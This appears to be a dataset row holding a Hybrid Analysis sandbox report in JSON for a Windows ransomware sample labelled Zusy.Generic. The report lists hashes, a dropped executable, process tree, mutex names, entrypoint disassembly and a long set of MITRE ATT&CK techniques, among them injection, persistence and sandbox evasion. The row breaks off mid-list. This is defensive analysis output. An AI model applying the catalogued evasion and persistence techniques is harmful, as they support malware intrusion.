id
stringlengths
64
64
url
stringlengths
99
99
source
stringclasses
5 values
report
stringlengths
3.94k
336k
91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5
https://hybrid-analysis.com/sample/91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5
Hybrid Analysis - Ransomware
{"size": 605960, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5", "sha256": "91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5", "av_detect": 87, "vx_family": "Zusy.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 144, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 605964, "sha256": "82e20946cc8d5b2a9f188a97c7a60ae023f78f2cb428e026c3262503f7ca6a26", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 4920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004572", "name": "91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe", "normalized_path": "C:\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe", "sha256": "91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5"}, {"uid": "00000000-00003412", "parentuid": "00000000-00004572", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe *", "sha256": "82e20946cc8d5b2a9f188a97c7a60ae023f78f2cb428e026c3262503f7ca6a26"}, {"uid": "00000000-00004920", "parentuid": "00000000-00003412", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZWVYXG", "sha256": "82e20946cc8d5b2a9f188a97c7a60ae023f78f2cb428e026c3262503f7ca6a26"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004572)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003412)\n 